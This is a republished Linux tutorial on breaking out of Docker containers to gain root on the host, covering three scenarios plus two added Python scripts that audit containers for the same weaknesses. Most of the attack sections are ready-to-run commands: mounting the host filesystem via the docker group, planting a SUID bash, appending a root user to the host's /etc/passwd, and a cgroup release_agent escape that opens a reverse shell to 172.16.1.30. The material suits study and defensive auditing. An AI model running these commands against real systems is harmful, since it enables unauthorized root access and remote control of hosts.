How to Break Out of Docker Containers and Gain Root Access on Linux

This tutorial walks through Docker privilege‑escalation techniques, showing how to enumerate Docker permissions, exploit docker group membership, use GTFOBins and LinPEAS, and break out of both privileged and non‑privileged containers to obtain a root shell on the host.

MaGe Linux Operations

Navigation

0 Introduction

1 What is Docker?

2 Finding Docker Privileges

2.1 Upgrade Shell to Full TTY

2.2 Manually Enumerate Users in the Docker Group

2.3 Manually Enumerate the Docker Service

2.4 Manually Enumerate Docker Images and Default User

2.5 Enumerate Docker with Tools – LinPEAS

3 Scenario 1: Privilege Escalation by Abusing Docker Group Permissions

4 Scenario 2: Foothold Directly in a Privileged Container

5 Scenario 3: Foothold Directly in a Non-Privileged Container

0. Introduction

In this article we explore Docker breakout techniques to gain root privileges on a target Linux host, covering three different exploitation scenarios.

1. What is Docker?

Docker is an open platform for developing, publishing and running applications in isolated containers. Containers run as root by default, and the Docker daemon ( dockerd ) also runs as root. The docker run command is the most interesting for attackers because it lets them start a container.

Containers are lightweight and contain everything needed to run an application.

2. Enumerating Docker Privileges

Assume we have a foothold as a regular user dawker on the target host.

2.1 Upgrade Shell to Full TTY

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL + Z
stty raw -echo; fg
export TERM=xterm

Having a full TTY allows command history, tab completion, and terminal clearing, which are useful for exploitation.

2.2 Manually Enumerate Users in the Docker Group

whoami ; id

The output shows the current user dawker belongs to the docker group.

2.3 Manually Enumerate Docker Service

find / -name docker.sock 2>/dev/null
ls -l /run/docker.sock

The docker.sock file is writable by the docker group, meaning we can interact with the Docker daemon from the current user.

2.4 Manually Enumerate Docker Images and Default User

docker images
docker run --rm -it alpine sh -c "whoami"

The Alpine image runs as root by default.

2.5 Use LinPEAS for Automated Enumeration

LinPEAS confirms that the current user is in the docker group, the Docker daemon runs as root, and the docker.sock file is writable. It also lists other useful information such as capabilities and security profiles.

3. Scenario 1 – Abuse Docker Group Privileges

Using GTFOBins we find a Docker exploit that mounts the host filesystem and gives a root shell.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

After mounting the host filesystem, create a SUID bash binary to obtain a persistent root shell:

cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p

4. Scenario 2 – Directly Inside a Privileged Container

First confirm we are inside a Docker container by checking for .dockerenv and examining /proc/1/cgroup:

cat /proc/1/cgroup

Verify the container is privileged by running fdisk -l and checking the seccomp status in /proc/1/status: in a privileged container fdisk -l lists the host's disks and the Seccomp field is 0 (no filter applied), whereas in a default container fdisk fails and the field is 2.

fdisk -l | grep -A 10 -i "device"
cat /proc/1/status | grep -i "seccomp"

Mount the host filesystem, add a new root user, and SSH into the host:

openssl passwd -1 -salt r00t password123
echo 'r00t:$1$r00t$HZoYdo0F7UZbuKrEXMcah0:0:0:/dev/shm/pwnt:/bin/bash' >> /mnt/juggernaut/etc/passwd
ssh r00t@<host-ip>

5. Scenario 3 – Break Out of a Non‑Privileged Container

Check that the container is non-privileged (fdisk -l fails, the seccomp status shows 2/1, and /dev contains only a few entries). Then verify that CAP_SYS_ADMIN is present in the capability set and that no AppArmor profile is loaded:

capsh --print
cat /sys/kernel/security/apparmor/profiles
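The manual checks in Scenarios 2 and 3 (the Seccomp field, CAP_SYS_ADMIN in the capability set, the AppArmor state) can be scripted for a quick container self-assessment or a fleet audit. This is an added example, not code from the article: it classifies a container from the text of /proc/1/status using constructed samples, and takes the AppArmor state as a boolean argument rather than reading /sys itself.

```python
"""Classify a container from /proc/<pid>/status, the file the article greps for
Seccomp. Added example, not from the original article; samples are constructed."""

CAP_SYS_ADMIN = 21  # bit number from the kernel's include/uapi/linux/capability.h

def parse_status(text):
    """Turn the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def has_cap(cap_hex, bit):
    """True if capability `bit` is set in a CapEff/CapBnd hex mask."""
    return bool((int(cap_hex, 16) >> bit) & 1)

def classify(status_text, apparmor_profile_loaded=False):
    """Report seccomp mode, CAP_SYS_ADMIN and a verdict for the article's checks.

    Seccomp 0 = disabled (what --privileged leaves), 2 = filter mode (Docker's
    default profile). CAP_SYS_ADMIN without AppArmor is the Scenario 3 precondition."""
    f = parse_status(status_text)
    seccomp = int(f.get("Seccomp", "0"))
    sys_admin = has_cap(f.get("CapEff", "0"), CAP_SYS_ADMIN)
    if seccomp == 0 and sys_admin:
        verdict = "privileged"
    elif sys_admin and not apparmor_profile_loaded:
        verdict = "cap_sys_admin_unconfined"
    elif sys_admin:
        verdict = "cap_sys_admin_confined"
    else:
        verdict = "default"
    return {"seccomp": seccomp, "cap_sys_admin": sys_admin, "verdict": verdict}

# Constructed excerpts of /proc/1/status (only the fields used here).
PRIVILEGED = "Name:\tsh\nSeccomp:\t0\nCapEff:\t0000003fffffffff\n"
DEFAULT = "Name:\tsh\nSeccomp:\t2\nCapEff:\t00000000a80425fb\n"  # Docker's default cap set
WITH_SYS_ADMIN = "Name:\tsh\nSeccomp:\t2\nCapEff:\t00000000a82425fb\n"  # default + SYS_ADMIN

if __name__ == "__main__":
    # On a real host read open("/proc/1/status").read() instead of a sample.
    for label, sample in (("privileged", PRIVILEGED), ("default", DEFAULT),
                          ("cap-add SYS_ADMIN", WITH_SYS_ADMIN)):
        print(label, "->", classify(sample))
```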

Use the “release_agent breakout 2” technique to gain a root shell on the host:

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/breakout" > /tmp/cgrp/release_agent
echo '#!/bin/bash' > /breakout
echo 'bash -i >& /dev/tcp/172.16.1.30/443 0>&1' >> /breakout
chmod a+x /breakout
# attacker: nc -nvlp 443
sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"

The payload executes and provides a root shell on the host even though the container was not started with --privileged.

All techniques assume the attacker can run commands inside the container and that the Docker daemon is configured with its default (root) privileges.
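From the host side, the preconditions for all three scenarios (the host root bind-mounted into a container, --privileged, or CAP_SYS_ADMIN added with AppArmor or seccomp unconfined) are visible in docker inspect output. This is an added example, not part of the original article: the inspect excerpts are constructed and carry only the HostConfig fields the audit reads.

```python
"""Audit `docker inspect` output for the breakout preconditions in this article.
Added example, not from the original post; the inspect excerpts are constructed."""
import json

# Bind-mount sources that hand the container the host (the article's Scenario 1).
SENSITIVE_SOURCES = {"/", "/var/run/docker.sock", "/run/docker.sock"}

def _opt_pair(opt):
    """Split a 'key=value' or legacy 'key:value' security option."""
    for sep in ("=", ":"):
        if sep in opt:
            key, _, value = opt.partition(sep)
            return key.strip().lower(), value.strip().lower()
    return opt.strip().lower(), ""

def audit_host_config(hc):
    """Return findings (strings) for one container's HostConfig dict."""
    findings = []
    if hc.get("Privileged"):
        findings.append("Privileged=true: all capabilities, seccomp off, host disks visible")
    caps = {c.upper().replace("CAP_", "", 1) for c in hc.get("CapAdd") or []}
    if caps & {"SYS_ADMIN", "ALL"}:
        findings.append("CapAdd grants CAP_SYS_ADMIN: cgroup release_agent escape possible")
    for opt in hc.get("SecurityOpt") or []:
        key, value = _opt_pair(opt)
        if key in ("apparmor", "seccomp") and value == "unconfined":
            findings.append(f"{key} disabled via SecurityOpt")
    for bind in hc.get("Binds") or []:
        src = bind.split(":")[0]
        if src in SENSITIVE_SOURCES or src.rstrip("/") in SENSITIVE_SOURCES:
            findings.append(f"host path {src} bind-mounted: chroot to host or daemon control")
    return findings

def audit_inspect(inspect_json):
    """Map container name -> findings for the JSON array that `docker inspect` prints."""
    return {c.get("Name", "?").lstrip("/"): audit_host_config(c.get("HostConfig", {}))
            for c in json.loads(inspect_json)}

# Constructed excerpts (only the fields used here), not real inspect output.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/breakout-target", "HostConfig": {"Privileged": True, "Binds": ["/:/mnt"]}},
    {"Name": "/sysadmin-cap", "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"],
                                             "SecurityOpt": ["apparmor=unconfined"]}},
    {"Name": "/hardened", "HostConfig": {"Privileged": False, "CapDrop": ["ALL"],
                                         "Binds": ["/srv/app:/app:ro"],
                                         "SecurityOpt": ["no-new-privileges"]}},
])

if __name__ == "__main__":
    # Real use: audit_inspect(subprocess.check_output(["docker", "inspect", name]))
    for name, findings in audit_inspect(SAMPLE_INSPECT).items():
        print(name, "->", findings or ["no breakout preconditions found"])
```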
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
